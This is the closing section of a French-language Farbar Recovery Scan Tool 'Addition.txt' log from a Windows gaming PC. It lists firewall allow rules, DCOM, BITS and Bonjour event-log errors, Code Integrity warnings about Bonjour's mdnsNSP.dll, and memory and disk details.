[UDP Query User{8640BBD1-67FC-475F-B25F-DD4FAD247550}D:\applications\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\applications\steam\steamapps\common\awesomenauts\awesomenauts.exe FirewallRules: [TCP Query User{9FA1A06E-BC6A-4126-A4C3-2E062C27324C}D:\applications\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\applications\steam\steamapps\common\awesomenauts\awesomenauts.exe FirewallRules: [{C77C590D-5E76-4520-87AB-4FE471AC2F47}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe FirewallRules: [{B0F67335-BF6F-4F7B-A98B-3B104790AB19}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe FirewallRules: [{C66044E9-8F38-4418-89FB-ACE0F694FD26}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe FirewallRules: [{8C7A9F3F-B641-4183-BCFA-F4B82E200E73}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe FirewallRules: [UDP Query User{A2FCC9A0-4353-4763-A28E-973C769B06BB}C:\users\truff\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.172\pluginhost.exe] => (Allow) C:\users\truff\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.172\pluginhost.exe FirewallRules: [TCP Query User{6D353EAE-E9CD-4FFA-A72F-38A669A876B9}C:\users\truff\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.172\pluginhost.exe] => (Allow) C:\users\truff\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.172\pluginhost.exe FirewallRules: [UDP Query User{4877A520-351D-4468-A1C5-CAD73984951B}C:\users\truff\appdata\local\mycomgames\mycomgames.exe] => (Allow) C:\users\truff\appdata\local\mycomgames\mycomgames.exe FirewallRules: [TCP Query User{009F9BA9-6FF1-487D-99C2-859A73BD57E9}C:\users\truff\appdata\local\mycomgames\mycomgames.exe] => (Allow) C:\users\truff\appdata\local\mycomgames\mycomgames.exe FirewallRules: [UDP Query User{7E378CBB-6066-490B-8BDF-1BFD4F2163D7}C:\users\truff\appdata\local\mycomgames\mycomgames.exe] => (Allow) C:\users\truff\appdata\local\mycomgames\mycomgames.exe FirewallRules: [TCP Query User{9A2A2222-FA19-459A-B99F-163482D765D1}C:\users\truff\appdata\local\mycomgames\mycomgames.exe] => (Allow) C:\users\truff\appdata\local\mycomgames\mycomgames.exe FirewallRules: [{BA619ED7-9790-4223-AF34-994DA68BB676}] => (Allow) D:\Applications\Steam\SteamApps\common\Warface\WarfaceMycomSteamLoader.exe FirewallRules: [{422D2B05-6A4D-4DB2-AD1B-D0FB82F351C7}] => (Allow) D:\Applications\Steam\SteamApps\common\Warface\WarfaceMycomSteamLoader.exe FirewallRules: [{3B7D722C-1EEC-44C6-9FAA-3CA7F9B9F602}] => (Allow) D:\Applications\Steam\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe FirewallRules: [{CB2B5A8B-BC1B-41B6-B263-7F188EDB5949}] => (Allow) D:\Applications\Steam\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe FirewallRules: [{2FEE54CB-71C5-4583-9813-7EE8CC7A9994}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{5C5418F2-A782-47F4-BC2A-D99E2F8E0285}] => (Allow) C:\Program Files\DriversCloud.com\DriversCloud.exe FirewallRules: [{00666E5B-4F47-486B-B719-F4AB19254DF8}] => (Allow) C:\Program Files\DriversCloud.com\DriversCloud.exe FirewallRules: [{D38775E9-0948-440B-8895-0FDDF2A1F0CA}] => (Allow) D:\Applications\Steam\SteamApps\common\Warface\live\gflauncher.exe FirewallRules: [{EB2FD261-62DB-45C6-8C9F-C0632FB2AC03}] => (Allow) D:\Applications\Steam\SteamApps\common\Warface\live\gflauncher.exe FirewallRules: [{149AE2B5-50BB-4D6F-9585-0F156446B39B}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{50873499-61C2-4CCB-ADF0-2DDC408B04E0}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{ABD99254-18D9-4E49-BB78-235AD52817CE}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{A266F33F-4093-4446-8005-A442AB6C9DAC}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [UDP Query User{C083B386-00EC-4ADE-8B01-5CD58DF0C0F0}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [TCP Query User{5003636E-9A82-4CF8-AAAE-AF3BB89984AC}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [{88534048-92B0-4434-B900-7CC55D4D607A}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe FirewallRules: [{46B62EA1-692C-43BF-A543-925F26966896}] => (Allow) LPort=2869 FirewallRules: [{70C1D52C-B586-4EA1-98E9-020CFC70DF45}] => (Allow) LPort=1900 FirewallRules: [{4CF93D77-771D-419C-9DD0-5DAFC1472D2A}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD10\PowerDVD Cinema\PowerDVDCinema10.exe FirewallRules: [{71CBE69E-4136-47C0-8A17-BE66540FD5ED}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD10\PowerDVD10.EXE FirewallRules: [{B2A4243F-31BD-412B-B5EC-2C5A170E3034}] => (Allow) D:\Applications\Steam\Steam.exe FirewallRules: [{8F1104B1-6671-481D-B5A0-2EFE11594B29}] => (Allow) D:\Applications\Steam\Steam.exe FirewallRules: [{55F9A404-4DB8-4DAC-9D0C-98B4AE8560B2}] => (Allow) D:\Applications\Steam\SteamApps\common\Call of Duty Modern Warfare 3\iw5mp.exe FirewallRules: [{ADDF9F44-B880-422F-A720-76DBAE41619B}] => (Allow) D:\Applications\Steam\SteamApps\common\Call of Duty Modern Warfare 3\iw5mp.exe FirewallRules: [{FDFD0437-F1B3-4D7A-86A5-9BD1C4129CC3}] => (Allow) D:\Applications\Steam\SteamApps\common\Call of Duty Black Ops II\t6mp.exe FirewallRules: [{76297570-7BDC-4D50-AC81-438BD659A750}] => (Allow) D:\Applications\Steam\SteamApps\common\Call of Duty Black Ops II\t6mp.exe FirewallRules: [{A3A2E173-A3D0-44AD-9289-625460ED7893}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe FirewallRules: [{E10B9E28-DB32-4A33-AF7B-8CC070C19B8C}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe FirewallRules: [{60FE0C86-7E51-495B-8CF8-5D6A246B6AED}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe FirewallRules: [{9594D3E6-5467-42F1-A69B-42696FEE6794}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe FirewallRules: [{E594CBB9-F4C9-4F60-B80D-53C08EBDCDEB}] => (Allow) D:\Applications\Steam\SteamApps\common\Call of Duty Black Ops II\t6sp.exe FirewallRules: [{3D229C20-123F-4672-953E-AC74FB3D7FFD}] => (Allow) D:\Applications\Steam\SteamApps\common\Call of Duty Black Ops II\t6sp.exe FirewallRules: [{F9EBE9E2-5DA4-43A7-87DF-A050A584C3E3}] => (Allow) D:\Applications\Steam\SteamApps\common\Call of Duty Modern Warfare 3\iw5sp.exe FirewallRules: [{BBDA8368-A3DE-4BC5-9D64-D1E6463CD31D}] => (Allow) D:\Applications\Steam\SteamApps\common\Call of Duty Modern Warfare 3\iw5sp.exe FirewallRules: [{CE489EFA-CB01-4967-9D5C-159F83FFE71F}] => (Allow) D:\Applications\Microsoft Office\Office14\GROOVE.EXE FirewallRules: [{6AA2E127-9BC0-42D1-B9F2-E120B049F239}] => (Allow) D:\Applications\Microsoft Office\Office14\GROOVE.EXE FirewallRules: [{4AAC2B12-1451-466E-A1CE-6D260C14153A}] => (Allow) D:\Applications\Microsoft Office\Office14\ONENOTE.EXE FirewallRules: [{D0AD952A-216D-4832-88F6-126D8A2B9C96}] => (Allow) D:\Applications\Microsoft Office\Office14\ONENOTE.EXE FirewallRules: [{E53FF768-2641-4A00-A9FB-CD0E338DAC8E}] => (Allow) D:\Applications\Microsoft Office\Office14\outlook.exe FirewallRules: [{B0725E3F-1A02-4AF9-9354-7EADBE52176B}] => (Allow) D:\Applications\Steam\bin\steamwebhelper.exe FirewallRules: [{71588367-31BB-4811-B9BD-ABFA739EDFED}] => (Allow) D:\Applications\Steam\bin\steamwebhelper.exe FirewallRules: [TCP Query User{B5A417E3-3047-496A-B1E1-6544E124A4F3}C:\program files (x86)\java\jre1.8.0_31\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_31\bin\javaw.exe FirewallRules: [UDP Query User{79BC0BF7-AC13-456F-9F83-BFE11C5494CA}C:\program files (x86)\java\jre1.8.0_31\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_31\bin\javaw.exe FirewallRules: [{E7795E1B-8BDB-4160-ADE1-9AFFC8D901A2}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{FB12C4BD-9A79-4965-B931-4651C06C2431}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{87A3EEAA-4DB0-4D16-B2CF-FBF18C798B2C}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [TCP Query User{3A4D639D-7CA1-495A-BE76-E06122366F2C}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [UDP Query User{493340E2-8912-4F0D-9E88-BF4DF3B7C623}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [{ECAACA23-D3AE-43B4-AB8E-5C30B4237977}] => (Allow) D:\Applications\Steam\SteamApps\common\Borderlands 2\Binaries\Win32\Launcher.exe FirewallRules: [{0A60DCE2-9249-4C0F-AE94-F21898854661}] => (Allow) D:\Applications\Steam\SteamApps\common\Borderlands 2\Binaries\Win32\Launcher.exe FirewallRules: [{3D903758-40C0-4AAB-8D82-22A94A6FF0D0}] => (Allow) D:\Applications\Steam\SteamApps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe FirewallRules: [{08F5B907-9C2F-412D-97EB-56DF86392628}] => (Allow) D:\Applications\Steam\SteamApps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe FirewallRules: [{563F3BBD-5E0D-4012-8D76-EFD3794408F1}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe FirewallRules: [{5CEAE887-29EB-458D-810B-894F080BEEB7}] => (Allow) C:\Program Files\iTunes\iTunes.exe FirewallRules: [{BC6A9ED6-60AA-4354-8A4C-7171FCA90D29}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe ==================== Points de restauration ========================= ATTENTION: La Restauration système est désactivée ==================== Éléments en erreur du Gestionnaire de périphériques ============= ==================== Erreurs du Journal des événements: ========================= Erreurs Application: ================== Error: (01/08/2018 06:42:14 PM) (Source: Perflib) (EventID: 1008) (User: ) Description: Échec de la procédure d’ouverture pour le service « BITS » dans la DLL « C:\Windows\System32\bitsperf.dll ». Les données de performance de ce service ne seront pas disponibles. Le premier mot (DWORD) de la section Données contient le code d’erreur. Error: (01/07/2018 03:41:24 AM) (Source: Perflib) (EventID: 1008) (User: ) Description: Échec de la procédure d’ouverture pour le service « BITS » dans la DLL « C:\Windows\System32\bitsperf.dll ». Les données de performance de ce service ne seront pas disponibles. Le premier mot (DWORD) de la section Données contient le code d’erreur. Error: (01/03/2018 10:47:01 PM) (Source: Perflib) (EventID: 1008) (User: ) Description: Échec de la procédure d’ouverture pour le service « BITS » dans la DLL « C:\Windows\System32\bitsperf.dll ». Les données de performance de ce service ne seront pas disponibles. Le premier mot (DWORD) de la section Données contient le code d’erreur. Error: (01/02/2018 08:29:53 PM) (Source: Perflib) (EventID: 1008) (User: ) Description: Échec de la procédure d’ouverture pour le service « BITS » dans la DLL « C:\Windows\System32\bitsperf.dll ». Les données de performance de ce service ne seront pas disponibles. Le premier mot (DWORD) de la section Données contient le code d’erreur. Error: (01/01/2018 03:56:09 PM) (Source: Perflib) (EventID: 1008) (User: ) Description: Échec de la procédure d’ouverture pour le service « BITS » dans la DLL « C:\Windows\System32\bitsperf.dll ». Les données de performance de ce service ne seront pas disponibles. Le premier mot (DWORD) de la section Données contient le code d’erreur. Error: (12/31/2017 03:23:04 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Local Hostname SpaceshipII.local already in use; will try SpaceshipII-2.local instead Error: (12/31/2017 03:23:04 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: ProbeCount 1; will deregister 4 SpaceshipII.local. Addr 192.168.1.11 Error: (12/31/2017 03:23:04 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Received from 192.168.1.11:5353 16 SpaceshipII.local. AAAA 2A01:CB1C:02B8:C900:48BB:85D3:C2A7:72F4 Error: (12/30/2017 10:36:52 PM) (Source: Perflib) (EventID: 1008) (User: ) Description: Échec de la procédure d’ouverture pour le service « BITS » dans la DLL « C:\Windows\System32\bitsperf.dll ». Les données de performance de ce service ne seront pas disponibles. Le premier mot (DWORD) de la section Données contient le code d’erreur. Error: (12/29/2017 09:03:13 PM) (Source: Perflib) (EventID: 1008) (User: ) Description: Échec de la procédure d’ouverture pour le service « BITS » dans la DLL « C:\Windows\System32\bitsperf.dll ». Les données de performance de ce service ne seront pas disponibles. Le premier mot (DWORD) de la section Données contient le code d’erreur. Erreurs système: ============= Error: (01/09/2018 06:56:26 PM) (Source: DCOM) (EventID: 10016) (User: SPACESHIPII) Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} et l’APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} au SID SpaceshipII\Truff de l’utilisateur (S-1-5-21-1552058139-121831200-1710227419-1002) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants. Error: (01/09/2018 06:35:01 PM) (Source: DCOM) (EventID: 10016) (User: SPACESHIPII) Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} et l’APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} au SID SpaceshipII\Truff de l’utilisateur (S-1-5-21-1552058139-121831200-1710227419-1002) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants. Error: (01/09/2018 05:53:16 PM) (Source: DCOM) (EventID: 10016) (User: SPACESHIPII) Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} et l’APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} au SID SpaceshipII\Truff de l’utilisateur (S-1-5-21-1552058139-121831200-1710227419-1002) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants. Error: (01/08/2018 11:31:19 PM) (Source: DCOM) (EventID: 10010) (User: SPACESHIPII) Description: Le serveur {D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48} ne s’est pas enregistré sur DCOM avant la fin du temps imparti. Error: (01/08/2018 11:31:19 PM) (Source: DCOM) (EventID: 10010) (User: SPACESHIPII) Description: Le serveur {D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48} ne s’est pas enregistré sur DCOM avant la fin du temps imparti. Error: (01/08/2018 11:31:19 PM) (Source: DCOM) (EventID: 10010) (User: SPACESHIPII) Description: Le serveur {D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48} ne s’est pas enregistré sur DCOM avant la fin du temps imparti. Error: (01/08/2018 11:31:19 PM) (Source: DCOM) (EventID: 10010) (User: SPACESHIPII) Description: Le serveur {D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48} ne s’est pas enregistré sur DCOM avant la fin du temps imparti. Error: (01/08/2018 11:01:30 PM) (Source: DCOM) (EventID: 10016) (User: SPACESHIPII) Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} et l’APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} au SID SpaceshipII\Truff de l’utilisateur (S-1-5-21-1552058139-121831200-1710227419-1002) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants. Error: (01/08/2018 07:40:37 PM) (Source: DCOM) (EventID: 10010) (User: SPACESHIPII) Description: Le serveur {D63B10C5-BB46-4990-A94F-E40B9D520160} ne s’est pas enregistré sur DCOM avant la fin du temps imparti. Error: (01/08/2018 07:40:37 PM) (Source: DCOM) (EventID: 10010) (User: SPACESHIPII) Description: Le serveur {D63B10C5-BB46-4990-A94F-E40B9D520160} ne s’est pas enregistré sur DCOM avant la fin du temps imparti. CodeIntegrity: =================================== Date: 2018-01-09 18:59:07.467 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2018-01-09 18:59:07.465 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2018-01-09 18:56:01.938 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2018-01-09 18:56:01.935 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2018-01-09 18:52:15.504 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2018-01-09 18:52:15.502 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2018-01-09 18:46:28.590 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2018-01-09 18:46:28.589 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2018-01-09 18:45:01.686 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2018-01-09 18:45:01.682 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. ==================== Infos Mémoire =========================== Processeur: Intel(R) Core(TM) i7-4800MQ CPU @ 2.70GHz Pourcentage de mémoire utilisée: 25% Mémoire physique - RAM - totale: 16302.7 MB Mémoire physique - RAM - disponible: 12201.02 MB Mémoire virtuelle totale: 19246.7 MB Mémoire virtuelle disponible: 14386.69 MB ==================== Lecteurs ================================ Drive c: (OS_Install) (Fixed) (Total:117.36 GB) (Free:16.07 GB) NTFS Drive d: (Data) (Fixed) (Total:913.75 GB) (Free:272.32 GB) NTFS Drive g: (Just.Cause.3) (CDROM) (Total:60.34 GB) (Free:0 GB) CDFS ==================== MBR & Table des partitions ================== ======================================================== Disk: 0 (Size: 119.2 GB) (Disk ID: 013913FC) Partition: GPT. ======================================================== Disk: 1 (Size: 931.5 GB) (Disk ID: 013913CC) Partition: GPT. ==================== Fin de Addition.txt ============================